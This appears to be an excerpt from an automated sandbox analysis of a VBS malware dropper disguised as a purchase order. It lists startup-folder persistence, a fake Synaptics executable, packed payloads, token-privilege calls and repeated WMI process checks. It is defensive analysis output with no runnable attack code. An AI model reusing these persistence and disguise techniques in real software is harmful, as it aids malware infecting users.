                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00F22570 appears 46 times
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00F1CAEE appears 46 times
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00F40650 appears 38 times
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00F3017E appears 46 times
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00F3247B appears 36 times
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00F15CD3 appears 48 times
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00F2E3CC appears 44 times
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00F31BC7 appears 41 times
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: String function: 00F2C619 appears 38 times
                              Source: Purchase Order Summary Details.vbsInitial sample: Strings found which are bigger than 50
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7792 -s 4704
                              Source: FGNEBI[1].exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Source: FGNEBI[1].exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: update.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Source: update.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Source: Synaptics.exe.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: RCX8AC4.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ~$cache1.10.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winVBS@27/89@14/5
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F5D712 GetLastError,FormatMessageW,7_2_00F5D712
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F4B8B0 AdjustTokenPrivileges,CloseHandle,7_2_00F4B8B0
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F4BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,7_2_00F4BEC3
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D9B8B0 AdjustTokenPrivileges,CloseHandle,16_2_00D9B8B0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00D9BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,16_2_00D9BEC3
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F4B8B0 AdjustTokenPrivileges,CloseHandle,23_2_00F4B8B0
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F4BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,23_2_00F4BEC3
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F5EA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,7_2_00F5EA85
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F56F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,7_2_00F56F5B
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F5EFCD CoInitialize,CoCreateInstance,CoUninitialize,7_2_00F5EFCD
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F131F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,7_2_00F131F2
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FGNEBI[1].exeJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7792
                              Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeFile created: C:\Users\user\AppData\Local\Temp\WLJOQW.vbsJump to behavior
                              Source: Yara matchFile source: 1.0.update.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000001.00000000.1765967777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.1764738724.000002235FCCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.1766882659.000002235F095000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.1765415076.000002235F95C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX8AC4.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FGNEBI[1].exe, type: DROPPED
                              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs"
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
